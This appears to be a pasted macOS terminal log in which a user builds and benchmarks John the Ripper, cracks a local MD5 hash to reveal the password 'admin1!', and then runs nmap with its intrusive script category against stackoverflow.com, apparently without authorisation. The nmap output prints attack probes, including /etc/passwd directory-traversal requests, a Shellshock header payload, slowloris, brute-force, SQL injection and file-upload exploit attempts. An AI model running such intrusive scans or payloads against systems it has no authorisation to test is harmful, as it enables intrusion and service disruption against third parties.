  2888. rm -f ../run/john ../run/unshadow ../run/unafs ../run/unique ../run/undrop ../run/ssh2john ../run/rar2john ../run/zip2john ../run/genmkvpwd ../run/mkvcalcproba ../run/calc_stat ../run/tgtsnarf ../run/racf2john ../run/hccap2john ../run/pwsafe2john ../run/raw2dyna ../run/keepass2john ../run/pfx2john ../run/keychain2john ../run/keyring2john ../run/kwallet2john ../run/dmg2john ../run/putty2john ../run/uaf2john ../run/truecrypt_volume2john ../run/keystore2john ../run/wpapcap2john ../run/gpg2john ../run/cprepair ../run/luks2john ../run/base64conv ../run/SIPdump ../run/vncpcap2john
  2889. rm -f john-macosx-* *.o escrypt/*.o *.bak core
  2890. rm -f ../run/kernels/*.cl ../run/kernels/*.h ../run/kernels/*.bin
  2891. rm -f detect bench para-bench generic.h tmp.s
  2892. rm -f cuda/*.o cuda/*~ *~
  2893. cp /dev/null Makefile.dep
  2894. /usr/bin/find . -name \*.a -exec rm {} \;
  2895. /usr/bin/find . -name \*.o -exec rm {} \;
  2896. /bin/rm -f tests crypto_scrypt-best.o crypto_scrypt-common.o sha256.o tests.o crypto_scrypt-*.o
  2897. SixMillionKilaTons:src osx$
  2898.  
  2899.  
  2900.  
  2901.  
  2902.  
  2903.  
  2904.  
  2905.  
  2906.  
  2907.  
  2908. SixMillionKilaTons:src osx$ make -s
  2909. dynamic_fmt.c:7737:39: warning: address of array 'pPriv->dynamic_WHICH_TYPE_SIG'
  2910.      will always evaluate to 'true' [-Wpointer-bool-conversion]
  2911.        if (!ciphertext || !pPriv || !pPriv->dynamic_WHICH_TYPE_SIG) return 0;
  2912.                                     ~~~~~~~~^~~~~~~~~~~~~~~~~~~~~~
  2913. 1 warning generated.
  2914. PO_fmt_plug.c:196:31: warning: implicit conversion from 'int' to 'char' changes
  2915.      value from 247 to -9 [-Wconstant-conversion]
  2916.        po_buf[saved_key_len + 33] = 247;
  2917.                                   ~ ^~~
  2918. 1 warning generated.
  2919.  
  2920. gpg2john.c:470:1: warning: variable 'SYM_ALGS' is not needed and will not be
  2921.      emitted [-Wunneeded-internal-declaration]
  2922. SYM_ALGS[] = {
  2923. ^
  2924. gpg2john.c:1057:1: warning: variable 'TAG' is not needed and will not be emitted
  2925.      [-Wunneeded-internal-declaration]
  2926. TAG[] = {
  2927. ^
  2928. gpg2john.c:1266:1: warning: variable 'SIGSUB' is not needed and will not be
  2929.      emitted [-Wunneeded-internal-declaration]
  2930. SIGSUB[] = {
  2931. ^
  2932. 3 warnings generated.
  2933. ar: creating archive aes.a
  2934. clang: warning: argument unused during compilation: '-pthread' [-Wunused-command-line-argument]
  2935. clang: warning: argument unused during compilation: '-pthread' [-Wunused-command-line-argument]
  2936.  
  2937. Make process completed.
  2938.  
  2939.  
  2940.  
  2941. SixMillionKilaTons:src osx$
  2942. SixMillionKilaTons:src osx$
  2943.  
  2944.  
  2945.  
  2946.  
  2947.  
  2948.  
  2949.  
  2950.  
  2951.  
  2952.  
  2953.  
  2954. SixMillionKilaTons:~ osx$ cd /
  2955. SixMillionKilaTons:/ osx$ cd Applications
  2956.  
  2957.  
  2958.  
  2959.  
  2960. SixMillionKilaTons:Applications osx$ cd john
  2961. SixMillionKilaTons:john osx$ cd run
  2962. SixMillionKilaTons:run osx$ ./john --test
  2963. Benchmarking: descrypt, traditional crypt(3) [DES 128/128 SSE2-16]... DONE
  2964. Many salts: 2432K c/s real, 2432K c/s virtual
  2965. Only one salt:  2177K c/s real, 2177K c/s virtual
  2966.  
  2967. Benchmarking: bsdicrypt, BSDI crypt(3) ("_J9..", 725 iterations) [DES 128/128 SSE2-16]... DONE
  2968. Many salts: 79232 c/s real, 79232 c/s virtual
  2969. Only one salt:  77180 c/s real, 77180 c/s virtual
  2970.  
  2971. Benchmarking: md5crypt, crypt(3) $1$ [MD5 128/128 SSE4.1 20x]... DONE
  2972. Raw:    17540 c/s real, 17540 c/s virtual
  2973.  
  2974. Benchmarking: bcrypt ("$2a$05", 32 iterations) [Blowfish 32/64 X3]... DONE
  2975. Raw:    705 c/s real, 705 c/s virtual
  2976.  
  2977. Benchmarking: scrypt (16384, 8, 1) [Salsa20/8 128/128 SSE2]... DONE
  2978. Raw:    20.0 c/s real, 19.8 c/s virtual
  2979.  
  2980. Benchmarking: LM [DES 128/128 SSE2-16]... DONE
  2981. Raw:    17442K c/s real, 17442K c/s virtual
  2982.  
  2983. Benchmarking: AFS, Kerberos AFS [DES 48/64 4K]... DONE
  2984. Short:  303651 c/s real, 303651 c/s virtual
  2985. Long:   764928 c/s real, 780538 c/s virtual
  2986.  
  2987. Benchmarking: tripcode [DES 128/128 SSE2-16]... DONE
  2988. Raw:    1949K c/s real, 2009K c/s virtual
  2989.  
  2990. Benchmarking: dummy [N/A]... DONE
  2991. Raw:    14408K c/s real, 14702K c/s virtual
  2992.  
  2993. Benchmarking: dynamic_0 [md5($p) (raw-md5) 128/128 SSE4.1 6x4x5]... DONE
  2994. Raw:    9337K c/s real, 9829K c/s virtual
  2995.  
  2996. Benchmarking: dynamic_1 [md5($p.$s) (joomla) 128/128 SSE4.1 6x4x5]... DONE
  2997. Many salts: 8777K c/s real, 9139K c/s virtual
  2998. Only one salt:  6185K c/s real, 6311K c/s virtual
  2999.  
  3000. Benchmarking: dynamic_2 [md5(md5($p)) (e107) 128/128 SSE4.1 6x4x5]... DONE
  3001. Raw:    5469K c/s real, 5638K c/s virtual
  3002.  
  3003. Benchmarking: dynamic_3 [md5(md5(md5($p))) 128/128 SSE4.1 6x4x5]... DONE
  3004. Raw:    3872K c/s real, 3911K c/s virtual
  3005.  
  3006. Benchmarking: dynamic_4 [md5($s.$p) (OSC) 128/128 SSE4.1 6x4x5]... DONE
  3007. Many salts: 10133K c/s real, 10340K c/s virtual
  3008. Only one salt:  6631K c/s real, 6698K c/s virtual
  3009.  
  3010. Benchmarking: dynamic_5 [md5($s.$p.$s) 128/128 SSE4.1 6x4x5]... DONE
  3011. Many salts: 8363K c/s real, 8532K c/s virtual
  3012. Only one salt:  5606K c/s real, 5779K c/s virtual
  3013.  
  3014. Benchmarking: dynamic_6 [md5(md5($p).$s) 128/128 SSE4.1 6x4x5]... DONE
  3015. Many salts: 12775K c/s real, 13170K c/s virtual
  3016. Only one salt:  4215K c/s real, 4300K c/s virtual
  3017.  
  3018. Benchmarking: dynamic_8 [md5(md5($s).$p) 128/128 SSE4.1 6x4x5]... DONE
  3019. Many salts: 10028K c/s real, 10232K c/s virtual
  3020. Only one salt:  6602K c/s real, 6668K c/s virtual
  3021.  
  3022. Benchmarking: dynamic_9 [md5($s.md5($p)) 128/128 SSE4.1 6x4x5]... DONE
  3023. Many salts: 9656K c/s real, 9955K c/s virtual
  3024. Only one salt:  3841K c/s real, 3880K c/s virtual
  3025.  
  3026. Benchmarking: dynamic_10 [md5($s.md5($s.$p)) 128/128 SSE4.1 6x4x5]... DONE
  3027. Many salts: 4792K c/s real, 4940K c/s virtual
  3028. Only one salt:  3865K c/s real, 3943K c/s virtual
  3029.  
  3030. Benchmarking: dynamic_11 [md5($s.md5($p.$s)) 128/128 SSE4.1 6x4x5]... DONE
  3031. Many salts: 4762K c/s real, 4859K c/s virtual
  3032. Only one salt:  3838K c/s real, 3916K c/s virtual
  3033.  
  3034. Benchmarking: dynamic_12 [md5(md5($s).md5($p)) (IPB) 128/128 SSE4.1 6x4x5]... DONE
  3035. Many salts: 6296K c/s real, 6359K c/s virtual
  3036. Only one salt:  2265K c/s real, 2334K c/s virtual
  3037.  
  3038. Benchmarking: dynamic_13 [md5(md5($p).md5($s)) 128/128 SSE4.1 6x4x5]... DONE
  3039. Many salts: 6419K c/s real, 6616K c/s virtual
  3040. Only one salt:  2292K c/s real, 2292K c/s virtual
  3041.  
  3042. Benchmarking: dynamic_14 [md5($s.md5($p).$s) 128/128 SSE4.1 6x4x5]... DONE
  3043. Many salts: 8224K c/s real, 8391K c/s virtual
  3044. Only one salt:  3871K c/s real, 3950K c/s virtual
  3045.  
  3046. Benchmarking: dynamic_15 [md5($u.md5($p).$s) 128/128 SSE4.1 6x4x5]... DONE
  3047. Many salts: 8676K c/s real, 8854K c/s virtual
  3048. Only one salt:  1814K c/s real, 2791K c/s virtual
  3049.  
  3050. Benchmarking: dynamic_16 [md5(md5(md5($p).$s).$s2) 128/128 SSE4.1 6x4x5]... DONE
  3051. Many salts: 465000 c/s real, 1500K c/s virtual
  3052. Only one salt:  1114K c/s real, 1311K c/s virtual
  3053.  
  3054. Benchmarking: dynamic_17 [phpass ($P$ or $H$) 32/64 1x2  (MD5_body)]... DONE
  3055. Raw:    654 c/s real, 660 c/s virtual
  3056.  
  3057. Benchmarking: dynamic_18 [md5($s.Y.$p.0xF7.$s) (Post.Office MD5) 32/64 64x2 (MD5_body)]... DONE
  3058. Many salts: 312192 c/s real, 321847 c/s virtual
  3059. Only one salt:  312320 c/s real, 318693 c/s virtual
  3060.  
  3061. Benchmarking: dynamic_19 [Cisco PIX (MD5) 128/128 SSE4.1 6x4x5]... DONE
  3062. Raw:    5292K c/s real, 5454K c/s virtual
  3063.  
  3064. Benchmarking: dynamic_20 [Cisco ASA (MD5 salted) 128/128 SSE4.1 6x4x5]... DONE
  3065. Many salts: 6745K c/s real, 6813K c/s virtual
  3066. Only one salt:  4165K c/s real, 4165K c/s virtual
  3067.  
  3068. Benchmarking: dynamic_21 [HTTP Digest Access Auth 128/128 SSE4.1 6x4x5]... DONE
  3069. Many salts: 205440 c/s real, 207515 c/s virtual
  3070. Only one salt:  206040 c/s real, 206040 c/s virtual
  3071.  
  3072. Benchmarking: dynamic_22 [md5(sha1($p)) 128/128 SSE4.1 6x4x2]... DONE
  3073. Raw:    1891K c/s real, 1929K c/s virtual
  3074.  
  3075. Benchmarking: dynamic_23 [sha1(md5($p)) 128/128 SSE4.1 6x4x2]... DONE
  3076. Raw:    1896K c/s real, 2107K c/s virtual
  3077.  
  3078. Benchmarking: dynamic_24 [sha1($p.$s) 128/128 SSE4.1 6x4x2]... DONE
  3079. Many salts: 3748K c/s real, 4254K c/s virtual
  3080. Only one salt:  2151K c/s real, 2473K c/s virtual
  3081.  
  3082. Benchmarking: dynamic_25 [sha1($s.$p) 128/128 SSE4.1 6x4x2]... DONE
  3083. Many salts: 2997K c/s real, 3526K c/s virtual
  3084. Only one salt:  1899K c/s real, 2374K c/s virtual
  3085.  
  3086. Benchmarking: dynamic_26 [sha1($p) raw-sha1 128/128 SSE4.1 6x4x2]... DONE
  3087. Raw:    2151K c/s real, 2623K c/s virtual
  3088.  
  3089. Benchmarking: dynamic_29 [md5(unicode($p)) 128/128 SSE4.1 6x4x5]... DONE
  3090. Raw:    2070K c/s real, 2958K c/s virtual
  3091.  
  3092. Benchmarking: dynamic_30 [md4($p) (raw-md4) 128/128 SSE4.1 6x4x4]... DONE
  3093. Raw:    3404K c/s real, 4365K c/s virtual
  3094.  
  3095. Benchmarking: dynamic_31 [md4($s.$p) 128/128 SSE4.1 6x4x4]... DONE
  3096. Many salts: 3523K c/s real, 5105K c/s virtual
  3097. Only one salt:  2591K c/s real, 3355K c/s virtual
  3098.  
  3099. Benchmarking: dynamic_32 [md4($p.$s) 128/128 SSE4.1 6x4x4]... DONE
  3100. Many salts: 9292K c/s real, 9576K c/s virtual
  3101. Only one salt:  6895K c/s real, 7109K c/s virtual
  3102.  
  3103. Benchmarking: dynamic_33 [md4(unicode($p)) 128/128 SSE4.1 6x4x4]... DONE
  3104. Raw:    7964K c/s real, 8384K c/s virtual
  3105.  
  3106. Benchmarking: dynamic_34 [md5(md4($p)) 128/128 SSE4.1 6x4x4]... DONE
  3107. Raw:    4529K c/s real, 4716K c/s virtual
  3108.  
  3109. Benchmarking: dynamic_35 [sha1(uc($u).:.$p) (ManGOS) 128/128 SSE4.1 6x4x2]... DONE
  3110. Many salts: 6212K c/s real, 6339K c/s virtual
  3111. Only one salt:  4757K c/s real, 4854K c/s virtual
  3112.  
  3113. Benchmarking: dynamic_36 [sha1($u.:.$p) (ManGOS2) 128/128 SSE4.1 6x4x2]... DONE
  3114. Many salts: 6315K c/s real, 6718K c/s virtual
  3115. Only one salt:  4943K c/s real, 5044K c/s virtual
  3116.  
  3117. Benchmarking: dynamic_37 [sha1(lc($u).$p) (SMF) 128/128 SSE4.1 6x4x2]... DONE
  3118. Many salts: 6770K c/s real, 6980K c/s virtual
  3119. Only one salt:  4996K c/s real, 5204K c/s virtual
  3120.  
  3121. Benchmarking: dynamic_38 [sha1($s.sha1($s.sha1($p))) (Wolt3BB) 128/128 SSE4.1 6x4x2]... DONE
  3122. Many salts: 1143K c/s real, 1216K c/s virtual
  3123. Only one salt:  1179K c/s real, 1241K c/s virtual
  3124.  
  3125. Benchmarking: dynamic_39 [md5($s.pad16($p)) (net-md5) 128/128 SSE4.1 6x4x5]...DONE
  3126. Many salts: 4165K c/s real, 4385K c/s virtual
  3127. Only one salt:  3038K c/s real, 3131K c/s virtual
  3128.  
  3129. Benchmarking: dynamic_40 [sha1($s.pad20($p)) (net-sha1) 128/128 SSE4.1 6x4x2]... DONE
  3130. Many salts: 5058K c/s real, 5380K c/s virtual
  3131. Only one salt:  4254K c/s real, 4297K c/s virtual
  3132.  
  3133. Benchmarking: dynamic_50 [sha224($p) 128/128 SSE4.1 4x]... DONE
  3134. Raw:    3666K c/s real, 3704K c/s virtual
  3135.  
  3136. Benchmarking: dynamic_51 [sha224($s.$p) 128/128 SSE4.1 4x]... DONE
  3137. Many salts: 3687K c/s real, 3881K c/s virtual
  3138. Only one salt:  3227K c/s real, 3259K c/s virtual
  3139.  
  3140. Benchmarking: dynamic_52 [sha224($p.$s) 128/128 SSE4.1 4x]... DONE
  3141. Many salts: 3823K c/s real, 3942K c/s virtual
  3142. Only one salt:  3076K c/s real, 3308K c/s virtual
  3143.  
  3144. Benchmarking: dynamic_53 [sha224(sha224($p)) 128/128 SSE4.1 4x]... DONE
  3145. Raw:    1313K c/s real, 1367K c/s virtual
  3146.  
  3147. Benchmarking: dynamic_54 [sha224(sha224_raw($p)) 128/128 SSE4.1 4x]... DONE
  3148. Raw:    1869K c/s real, 1988K c/s virtual
  3149.  
  3150. Benchmarking: dynamic_55 [sha224(sha224($p).$s) 128/128 SSE4.1 4x]... DONE
  3151. Many salts: 1337K c/s real, 1468K c/s virtual
  3152. Only one salt:  1364K c/s real, 1406K c/s virtual
  3153.  
  3154. Benchmarking: dynamic_56 [sha224($s.sha224($p)) 128/128 SSE4.1 4x]... DONE
  3155. Many salts: 1472K c/s real, 1501K c/s virtual
  3156. Only one salt:  1405K c/s real, 1405K c/s virtual
  3157.  
  3158. Benchmarking: dynamic_57 [sha224(sha224($s).sha224($p)) 128/128 SSE4.1 4x]... DONE
  3159. Many salts: 1067K c/s real, 1057K c/s virtual
  3160. Only one salt:  985900 c/s real, 1005K c/s virtual
  3161.  
  3162. Benchmarking: dynamic_58 [sha224(sha224($p).sha224($p)) 128/128 SSE4.1 4x]... DONE
  3163. Raw:    1353K c/s real, 1339K c/s virtual
  3164.  
  3165. Benchmarking: dynamic_60 [sha256($p) 128/128 SSE4.1 4x]... DONE
  3166. Raw:    3791K c/s real, 3830K c/s virtual
  3167.  
  3168. Benchmarking: dynamic_61 [sha256($s.$p) 128/128 SSE4.1 4x]... DONE
  3169. Many salts: 3985K c/s real, 4026K c/s virtual
  3170. Only one salt:  3197K c/s real, 3331K c/s virtual
  3171.  
  3172. Benchmarking: dynamic_62 [sha256($p.$s) 128/128 SSE4.1 4x]... DONE
  3173. Many salts: 3950K c/s real, 3989K c/s virtual
  3174. Only one salt:  3423K c/s real, 3423K c/s virtual
  3175.  
  3176. Benchmarking: dynamic_63 [sha256(sha256($p)) 128/128 SSE4.1 4x]... DONE
  3177. Raw:    1381K c/s real, 1409K c/s virtual
  3178.  
  3179. Benchmarking: dynamic_64 [sha256(sha256_raw($p)) 128/128 SSE4.1 4x]... DONE
  3180. Raw:    1999K c/s real, 2019K c/s virtual
  3181.  
  3182. Benchmarking: dynamic_65 [sha256(sha256($p).$s) 128/128 SSE4.1 4x]... DONE
  3183. Many salts: 1420K c/s real, 1464K c/s virtual
  3184. Only one salt:  1370K c/s real, 1370K c/s virtual
  3185.  
  3186. Benchmarking: dynamic_66 [sha256($s.sha256($p)) 128/128 SSE4.1 4x]... DONE
  3187. Many salts: 1415K c/s real, 1490K c/s virtual
  3188. Only one salt:  1370K c/s real, 1370K c/s virtual
  3189.  
  3190. Benchmarking: dynamic_67 [sha256(sha256($s).sha256($p)) 128/128 SSE4.1 4x]... DONE
  3191. Many salts: 804840 c/s real, 856212 c/s virtual
  3192. Only one salt:  775560 c/s real, 791387 c/s virtual
  3193.  
  3194. Benchmarking: dynamic_68 [sha256(sha256($p).sha256($p)) 128/128 SSE4.1 4x]... DONE
  3195. Raw:    980160 c/s real, 1053K c/s virtual
  3196.  
  3197. Benchmarking: dynamic_70 [sha384($p) 64/64 128x1 sha2-OpenSSL]... DONE
  3198. Raw:    428160 c/s real, 450694 c/s virtual
  3199.  
  3200. Benchmarking: dynamic_71 [sha384($s.$p) 64/64 128x1 sha2-OpenSSL]... DONE
  3201. Many salts: 446208 c/s real, 455314 c/s virtual
  3202. Only one salt:  431398 c/s real, 453866 c/s virtual
  3203.  
  3204. Benchmarking: dynamic_72 [sha384($p.$s) 64/64 128x1 sha2-OpenSSL]... DONE
  3205. Many salts: 443648 c/s real, 457369 c/s virtual
  3206. Only one salt:  430257 c/s real, 438949 c/s virtual
  3207.  
  3208. Benchmarking: dynamic_73 [sha384(sha384($p)) 64/64 128x1 sha2-OpenSSL]... DONE
  3209. Raw:    206720 c/s real, 229688 c/s virtual
  3210.  
  3211. Benchmarking: dynamic_74 [sha384(sha384_raw($p)) 64/64 128x1 sha2-OpenSSL]... DONE
  3212. Raw:    220514 c/s real, 227265 c/s virtual
  3213.  
  3214. Benchmarking: dynamic_75 [sha384(sha384($p).$s) 64/64 128x1 sha2-OpenSSL]... ^Z
  3215. [1]+  Stopped                 ./john --test
  3216.  
  3217.  
  3218.  
  3219.  
  3220.  
  3221.  
  3222.  
  3223. SixMillionKilaTons:run osx$ sudo ./john --format=Raw-MD5 /Applications/Files/file2.txt
  3224. Password:
  3225. Loaded 1 password hash (Raw-MD5 [MD5 128/128 SSE4.1 20x])
  3226. Press 'q' or Ctrl-C to abort, almost any other key for status
  3227. admin1!          (?)
  3228. 1g 0:00:00:33 DONE 3/3 (2017-11-26 21:01) 0.02942g/s 1985Kp/s 1985Kc/s 1985KC/s adminil..admirel
  3229. Use the "--show" option to display all of the cracked passwords reliably
  3230. Session completed
  3231.  
  3232. SixMillionKilaTons:run osx$ sudo ./john --format=Raw-MD5 /Applications/Files/file2.txt
  3233. Loaded 1 password hash (Raw-MD5 [MD5 128/128 SSE4.1 20x])
  3234. No password hashes left to crack (see FAQ)
  3235.  
  3236.  
  3237.  
  3238.  
  3239. SixMillionKilaTons:run osx$ nmap --script intrusive stackoverflow.com
  3240.  
  3241. Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-24 19:15 EST
  3242.  
  3243. v
  3244.  
  3245. Verbosity Increased to 1.
  3246. Completed NSE at 19:15, 10.23s elapsed
  3247. Initiating NSE at 19:15
  3248. Completed NSE at 19:15, 0.00s elapsed
  3249. Initiating Ping Scan at 19:15
  3250. Scanning stackoverflow.com (151.101.65.69) [2 ports]
  3251. Completed Ping Scan at 19:15, 0.06s elapsed (1 total hosts)
  3252. Initiating Parallel DNS resolution of 1 host. at 19:15
  3253. Completed Parallel DNS resolution of 1 host. at 19:15, 0.07s elapsed
  3254. Initiating Connect Scan at 19:15
  3255. Scanning stackoverflow.com (151.101.65.69) [1000 ports]
  3256. Discovered open port 80/tcp on 151.101.65.69
  3257. Discovered open port 443/tcp on 151.101.65.69
  3258. Increasing send delay for 151.101.65.69 from 0 to 5 due to 26 out of 85 dropped probes since last increase.
  3259. Increasing send delay for 151.101.65.69 from 5 to 10 due to max_successful_tryno increase to 4
  3260. Increasing send delay for 151.101.65.69 from 10 to 20 due to max_successful_tryno increase to 5
  3261.  
  3262. V
  3263.  
  3264. Verbosity Decreased to 0.
  3265. Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
  3266. Connect Scan Timing: About 99.99% done; ETC: 19:16 (0:00:00 remaining)
  3267.  
  3268. d
  3269.  
  3270. Debugging Increased to 1.
  3271. Overall sending rates: 42.84 packets / s.
  3272. NSE: Script scanning 151.101.65.69.
  3273. NSE: Starting runlevel 1 (of 2) scan.
  3274. NSE: Starting http-feed against stackoverflow.com (151.101.65.69:80).
  3275. NSE: Starting http-csrf against stackoverflow.com (151.101.65.69:80).
  3276. NSE: Starting http-iis-short-name-brute against stackoverflow.com (151.101.65.69:443).
  3277. NSE: Starting http-devframework against stackoverflow.com (151.101.65.69:80).
  3278. NSE: [http-devframework 151.101.65.69:80] Loading fingerprints: /usr/local/bin/../share/nmap/nselib/data/http-devframework-fingerprints.lua
  3279. NSE: Starting http-unsafe-output-escaping against stackoverflow.com (151.101.65.69:443).
  3280. NSE: Starting http-iis-short-name-brute against stackoverflow.com (151.101.65.69:80).
  3281. NSE: Starting http-vuln-cve2012-1823 against stackoverflow.com (151.101.65.69:80).
  3282. NSE: Starting http-sitemap-generator against stackoverflow.com (151.101.65.69:80).
  3283. NSE: Starting citrix-brute-xml against stackoverflow.com (151.101.65.69:80).
  3284. NSE: Finished citrix-brute-xml against stackoverflow.com (151.101.65.69:80).
  3285. NSE: Starting http-form-fuzzer against stackoverflow.com (151.101.65.69:80).
  3286. NSE: Starting http-chrono against stackoverflow.com (151.101.65.69:80).
  3287. NSE: Starting http-vuln-cve2009-3960 against stackoverflow.com (151.101.65.69:443).
  3288. NSE: Starting http-passwd against stackoverflow.com (151.101.65.69:80).
  3289. NSE: Starting http-vuln-cve2012-1823 against stackoverflow.com (151.101.65.69:443).
  3290. NSE: Starting http-config-backup against stackoverflow.com (151.101.65.69:80).
  3291. NSE: Starting http-userdir-enum against stackoverflow.com (151.101.65.69:443).
  3292. NSE: [http-userdir-enum 151.101.65.69:443] Testing 10 usernames.
  3293. NSE: Starting http-stored-xss against stackoverflow.com (151.101.65.69:443).
  3294. NSE: Starting http-vuln-cve2013-7091 against stackoverflow.com (151.101.65.69:443).
  3295. NSE: [http-vuln-cve2013-7091 151.101.65.69:443] Trying to detect if the server is vulnerable
  3296. NSE: [http-vuln-cve2013-7091 151.101.65.69:443] GET /zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../dev/null%00
  3297. NSE: [http-vuln-cve2013-7091 151.101.65.69:443] GET /zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00
  3298. NSE: Starting http-exif-spider against stackoverflow.com (151.101.65.69:443).
  3299. NSE: Starting http-majordomo2-dir-traversal against stackoverflow.com (151.101.65.69:443).
  3300. NSE: [http-majordomo2-dir-traversal 151.101.65.69:443] HTTP GET stackoverflow.com/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd
  3301. NSE: Starting http-drupal-enum against stackoverflow.com (151.101.65.69:80).
  3302. NSE: Starting http-slowloris against stackoverflow.com (151.101.65.69:443).
  3303. NSE: Starting http-axis2-dir-traversal against stackoverflow.com (151.101.65.69:80).
  3304. NSE: Starting http-drupal-enum-users against stackoverflow.com (151.101.65.69:80).
  3305. NSE: [http-drupal-enum-users 151.101.65.69:80] Total number of pipelined requests: 38
  3306. NSE: Starting http-vhosts against stackoverflow.com (151.101.65.69:80).
  3307. NSE: Starting http-iis-webdav-vuln against stackoverflow.com (151.101.65.69:443).
  3308. NSE: Starting http-devframework against stackoverflow.com (151.101.65.69:443).
  3309. NSE: [http-devframework 151.101.65.69:443] Loading fingerprints: /usr/local/bin/../share/nmap/nselib/data/http-devframework-fingerprints.lua
  3310. NSE: Starting http-default-accounts against stackoverflow.com (151.101.65.69:80).
  3311. NSE: Starting http-feed against stackoverflow.com (151.101.65.69:443).
  3312. NSE: Starting http-userdir-enum against stackoverflow.com (151.101.65.69:80).
  3313. NSE: Starting http-joomla-brute against stackoverflow.com (151.101.65.69:80).
  3314. NSE: Starting http-errors against stackoverflow.com (151.101.65.69:80).
  3315. NSE: Starting http-dombased-xss against stackoverflow.com (151.101.65.69:443).
  3316. NSE: Starting http-awstatstotals-exec against stackoverflow.com (151.101.65.69:80).
  3317. NSE: Starting dns-brute against stackoverflow.com (151.101.65.69).
  3318. NSE: [dns-brute 151.101.65.69] Starting dns-brute at: stackoverflow.com
  3319. NSE: [dns-brute 151.101.65.69] THREADS: 5
  3320. NSE: Starting http-iis-webdav-vuln against stackoverflow.com (151.101.65.69:80).
  3321. NSE: Starting http-slowloris against stackoverflow.com (151.101.65.69:80).
  3322. NSE: Starting http-brute against stackoverflow.com (151.101.65.69:80).
  3323. NSE: Starting http-vuln-cve2013-7091 against stackoverflow.com (151.101.65.69:80).
  3324. NSE: [http-vuln-cve2013-7091 151.101.65.69:80] Trying to detect if the server is vulnerable
  3325. NSE: [http-vuln-cve2013-7091 151.101.65.69:80] GET /zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../dev/null%00
  3326. NSE: [http-vuln-cve2013-7091 151.101.65.69:80] GET /zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00
  3327. NSE: Starting http-passwd against stackoverflow.com (151.101.65.69:443).
  3328. NSE: Starting http-brute against stackoverflow.com (151.101.65.69:443).
  3329. NSE: Starting http-drupal-enum-users against stackoverflow.com (151.101.65.69:443).
  3330. NSE: [http-drupal-enum-users 151.101.65.69:443] Total number of pipelined requests: 38
  3331. NSE: Starting http-shellshock against stackoverflow.com (151.101.65.69:443).
  3332. NSE: [http-shellshock 151.101.65.69:443] Sending '() { :;}; echo; echo "BYNCERXJBALBGZX"' in HTTP headers:User-Agent,Cookie and Referer
  3333. NSE: Starting http-vhosts against stackoverflow.com (151.101.65.69:443).
  3334. NSE: Starting http-chrono against stackoverflow.com (151.101.65.69:443).
  3335. NSE: Starting http-sitemap-generator against stackoverflow.com (151.101.65.69:443).
  3336. NSE: Starting http-phpself-xss against stackoverflow.com (151.101.65.69:80).
  3337. NSE: Starting http-stored-xss against stackoverflow.com (151.101.65.69:80).
  3338. NSE: Starting http-form-brute against stackoverflow.com (151.101.65.69:80).
  3339. NSE: Starting http-rfi-spider against stackoverflow.com (151.101.65.69:80).
  3340. NSE: Starting http-enum against stackoverflow.com (151.101.65.69:443).
  3341. NSE: [http-enum 151.101.65.69:443] Loading fingerprint database: /usr/local/bin/../share/nmap/nselib/data/http-fingerprints.lua
  3342. NSE: [http-enum 151.101.65.69:443] Loaded 276 fingerprints
  3343. NSE: Starting http-default-accounts against stackoverflow.com (151.101.65.69:443).
  3344. NSE: Starting http-fileupload-exploiter against stackoverflow.com (151.101.65.69:80).
  3345. NSE: Starting http-exif-spider against stackoverflow.com (151.101.65.69:80).
  3346. NSE: Starting http-litespeed-sourcecode-download against stackoverflow.com (151.101.65.69:443).
  3347. NSE: [http-litespeed-sourcecode-download 151.101.65.69:443] Trying to download the source code of /index.php
  3348. NSE: Starting http-open-redirect against stackoverflow.com (151.101.65.69:443).
  3349. NSE: Starting citrix-brute-xml against stackoverflow.com (151.101.65.69:443).
  3350. NSE: Finished citrix-brute-xml against stackoverflow.com (151.101.65.69:443).
  3351. NSE: Starting http-drupal-enum against stackoverflow.com (151.101.65.69:443).
  3352. NSE: Starting http-enum against stackoverflow.com (151.101.65.69:80).
  3353. NSE: [http-enum 151.101.65.69:80] Loading fingerprint database: /usr/local/bin/../share/nmap/nselib/data/http-fingerprints.lua
  3354. NSE: [http-enum 151.101.65.69:80] Loaded 276 fingerprints
  3355. NSE: Starting http-majordomo2-dir-traversal against stackoverflow.com (151.101.65.69:80).
  3356. NSE: [http-majordomo2-dir-traversal 151.101.65.69:80] HTTP GET stackoverflow.com/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd
  3357. NSE: Starting http-form-fuzzer against stackoverflow.com (151.101.65.69:443).
  3358. NSE: Starting http-joomla-brute against stackoverflow.com (151.101.65.69:443).
  3359. NSE: Starting http-errors against stackoverflow.com (151.101.65.69:443).
  3360. NSE: Starting http-phpself-xss against stackoverflow.com (151.101.65.69:443).
  3361. NSE: Starting http-fileupload-exploiter against stackoverflow.com (151.101.65.69:443).
  3362. NSE: Starting http-litespeed-sourcecode-download against stackoverflow.com (151.101.65.69:80).
  3363. NSE: [http-litespeed-sourcecode-download 151.101.65.69:80] Trying to download the source code of /index.php
  3364. NSE: Starting http-csrf against stackoverflow.com (151.101.65.69:443).
  3365. NSE: Starting http-open-redirect against stackoverflow.com (151.101.65.69:80).
  3366. NSE: Starting http-sql-injection against stackoverflow.com (151.101.65.69:443).
  3367. NSE: Starting http-axis2-dir-traversal against stackoverflow.com (151.101.65.69:443).
  3368. NSE: Starting http-put against stackoverflow.com (151.101.65.69:443).
  3369. NSE: Finished http-put against stackoverflow.com (151.101.65.69:443).
  3370. NSE: Starting http-vuln-cve2009-3960 against stackoverflow.com (151.101.65.69:80).
  3371. NSE: Starting http-shellshock against stackoverflow.com (151.101.65.69:80).
